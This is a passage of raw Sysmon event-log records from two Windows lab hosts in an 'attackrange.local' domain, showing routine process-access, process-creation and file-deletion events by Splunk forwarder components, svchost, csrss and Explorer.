07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083034Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B467-615A-8501-00000000FD01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083033Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B467-615A-8501-00000000FD01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083032Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.524{2FDD8D40-B467-615A-8501-00000000FD01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083031Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.492{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B37B3CB5E7EB2355AA2CE761F8C9A3D,SHA256=3E08FA6F6EF75F4B19103C1581D81B740B0D4495626DAEF7F524D644CF46DA3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083030Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.242{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4889D7C58D3F40974C545E31BF1FCA34,SHA256=141800ECF2CA22738D1718EC874C3B1F65B132A10E5135902376E70CD64275FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106613Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:35.523{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-032MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106622Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.696{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5909A43459477B7122F8E39B74EB974F,SHA256=317B98D2F6CB181D080F3EDC837E77FDE1B69F0DFF739CB1D29A2BEE8A8B82CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083061Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.663{2FDD8D40-B468-615A-8601-00000000FD01}34001764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083060Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.569{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDB0B7DC63580B48D9B418AAD7969F60,SHA256=6B11CE8B589B7BBA5BE60F0C6FF05CCF38D5D04CBAF9E6062B37E7CE4DF6E0A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083059Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B468-615A-8601-00000000FD01}3400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083058Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083057Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083056Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083055Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083054Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083053Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083052Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083051Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083050Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083049Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B468-615A-8601-00000000FD01}3400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083048Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B468-615A-8601-00000000FD01}3400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083047Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.507{2FDD8D40-B468-615A-8601-00000000FD01}3400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083046Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:36.428{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29E56BDE61C9157A3EB835D83E12D99C,SHA256=C6AFA3C5615240C79E2E677953FAB7FCF5ACEFC38F75C0C76DB93C7B3211FF52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106621Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.094{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106620Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.094{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106619Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.094{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106618Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.084{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106617Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.084{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106616Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.084{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106615Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:36.084{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106623Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:37.697{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=143DC0A012F4D0DB1A06443C5CF26510,SHA256=B8A0034FB9044022F2E53452213C4E66070D45731EC720409D0D66387A26CCB5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083063Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.578{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program 